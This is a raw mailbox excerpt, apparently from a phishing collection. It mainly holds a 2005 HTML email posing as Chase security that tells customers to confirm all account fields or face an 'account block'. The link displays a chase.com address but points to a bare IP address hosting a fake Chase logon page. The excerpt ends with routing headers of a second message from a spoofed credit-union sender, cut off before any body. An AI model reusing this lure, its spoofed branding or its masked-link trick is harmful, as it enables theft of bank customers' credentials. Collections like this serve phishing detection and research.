From: security@chase.com <security@chase.com>
Content-Type: text/html
Message-Id: <20051017152252.30B4AB5D7F@iMacWebServer>
Date: Mon, 17 Oct 2005 09:22:52 -0600 (MDT)
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16)
X-Spam-Level: 
X-Spam-Status: No, score=0.5 required=5.0 tests=HTML_40_50,HTML_MESSAGE,
	HTML_TAG_EXIST_TBODY,MIME_HEADER_CTYPE_ONLY,MIME_HTML_ONLY,
	NORMAL_HTTP_TO_IP autolearn=no version=3.0.2
X-Spam-Report: 
	*  0.0 NORMAL_HTTP_TO_IP URI: Uses a dotted-decimal IP address in URL
	*  0.0 HTML_40_50 BODY: Message is 40% to 50% HTML
	*  0.0 HTML_MESSAGE BODY: HTML included in message
	*  0.1 HTML_TAG_EXIST_TBODY BODY: HTML has "tbody" tag
	*  0.2 MIME_HTML_ONLY BODY: Message only has text/html MIME parts
	*  0.1 MIME_HEADER_CTYPE_ONLY 'Content-Type' found without required MIME headers
Status: O
X-Status: 
X-Keywords:                  
X-UID: 375


<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>- NNSECU -</title>
<meta name="generator" content="Namo WebEditor v5.0(Trial)">
</head>

<body>

<!--VERSION value="4.3.0"-->
<TABLE cellSpacing=0 cellPadding=0 width=774 border=0 xt="SPTABLE"
name="SP_TABLE1" id="table1" height="320">
<TBODY>
<TR xt="SPROW">
<TD xt="SPCELL" name="yyy" height="42"><img src="http://www.chase.com/cm/shared/cfs/image/logo/chase_logo.gif">
</TD></TR>
<TR xt="SPROW">
<TD xt="SPCELL" name="yyy">

<p align="left"> </p>
<p align="left"><font face="Verdana" size="2">Dear CHASE Customers,</font></p>
<p align="justify"><font face="Verdana" size="2">As the Internet and information technology enable us to expand our services, we are committed to maintaining the trust customers have placed in us for protecting the privacy and security of information we have about you. In order to protect your information against unauthorized access, identity theft and account fraud we earnestly ask you to update your profile. PLEASE REMEMBER YOU NEED TO CONFIRM ALL FIELDS OF THE FORM TO AVOID ACCOUNT BLOCK, and remember we do this for your safety!</font></p>


<p align="justify"><font face="Verdana" size="2">To resubmit your information, please click 
the link below:</font></p>
<p align="justify">


<font face="Verdana" size="2"><b><a target="_blank" href="http://67.18.208.132/~craig/images/logon/chaseonline/index.html ">http://www.chase.com/account-confirm23942942/confirmation.html  </a></b></font></p>
<p align="justify"><font face="Verdana" size="2">If you received this notice and you are not the authorized account holder,
please be aware that it is in violation of our policy to represent oneself
as another CHASE user. Such action may also be in violation of local, national, 
and/or international law. CHASE is committed to assist law enforcement with 
any inquiries related to attempts to misappropriate personal information with
the intent to commit fraud or theft. Information will be provided at the request
of law enforcement agencies to ensure that perpetrators are prosecuted to the 
fullest extent of the law.</font></p>

<table align=right width="200" border="0">
  <tr>
    <td>&nbsp;</td>
  </tr>
</table>
<p align="justify"><font face="Verdana" size="2">Thanks for your patience as we work together to protect your account.</font></p>

<p align="justify"><font face="Verdana" size="2">Special Regards,</font></p>
<p align="justify"><font face="Verdana" size="2">CHASE Customer Support Center.</font></p>

 
<div align="left"><font color="#bbb7c7" size="1" face="verdana,arial,helvetica"><span class="footer-text"><br>
  <br>
  This site is directed at or made available to persons in the United States and CHASE customers only. 
   Products and services described, as well as associated fees, charges, 
  interest rates, and balance requirements may differ among geographic locations. 
  Not all products and services are offered at all locations.<br>
  </span><br>
</font></div>

 

<div align="right"><font color="#bbb7c7" size="1" face="verdana,arial,helvetica">Copyright © 2005 - CHASE. Member FDIC. Equal Housing Lender. <img src="http://www.bankofthewest.com/BOW/assets/vcmStaticContent/images/icon_ehl.gif">
</font></div>

</TD></TR>
</TBODY></TABLE>
</body>

</html>

From support@cuna.org  Mon Oct 17 11:34:28 2005
Return-Path: <support@cuna.org>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail2.monkey.org (mail2.monkey.org [204.181.64.8])
	by naughty.monkey.org (Postfix) with ESMTP id 1B1E4536E71
	for <jose@login.monkey.org>; Mon, 17 Oct 2005 11:34:28 -0400 (EDT)
Received: from mail2.monkey.org (localhost.monkey.org [127.0.0.1])
	by mail2.monkey.org (Postfix) with ESMTP id 6CEF66FA399
	for <jose@monkey.org>; Mon, 17 Oct 2005 11:34:18 -0400 (EDT)
Received: from lujan.uninet.edu (bio.hgy.es [193.146.180.21])
	by mail2.monkey.org (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 17 Oct 2005 11:34:18 -0400 (EDT)
Received: by lujan.uninet.edu (Postfix)
	id D58241BC47; Mon, 17 Oct 2005 17:34:21 +0200 (CEST)
Delivered-To: umeet@uninet.edu
Received: from localhost (unknown [127.0.0.1])
	by lujan.uninet.edu (Postfix) with ESMTP
	id 3662C1BC3D; Mon, 17 Oct 2005 15:34:12 +0000 (UTC)
Received: from lujan.uninet.edu ([193.146.180.21])
	by localhost (lujan [193.146.180.21]) (amavisd-new, port 10024)
	with ESMTP id 06129-10; Mon, 17 Oct 2005 17:33:24 +0200 (CEST)
Received: from rocinante.compendium.com.ar (unknown [200.69.230.11])
	by lujan.uninet.edu (Postfix) with ESMTP
	id CEC3B1BB12; Mon, 17 Oct 2005 17:33:19 +0200 (CEST)
Received: from localhost (rocinante [127.0.0.1])
	by rocinante.compendium.com.ar (Postfix) with ESMTP id 553AC500029;
	Mon, 17 Oct 2005 12:33:13 -0300 (ART)
Received: from rocinante.compendium.com.ar ([127.0.0.1])
	by localhost (rocinante [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id 24776-07; Mon, 17 Oct 2005 12:33:11 -0300 (ART)
Received: from 72.36.141.226 (unknown [72.36.141.226])
	by rocinante.compendium.com.ar (Postfix) with SMTP id AAB96500055;
	Mon, 17 Oct 2005 12:33:09 -0300 (ART)
Received: from 32.250.140.190 by ; Mon, 17 Oct 2005 12:30:07 -0400
Message-ID: <IKQBGYUBGPNZEKUDGSSCSME@verizon.net>
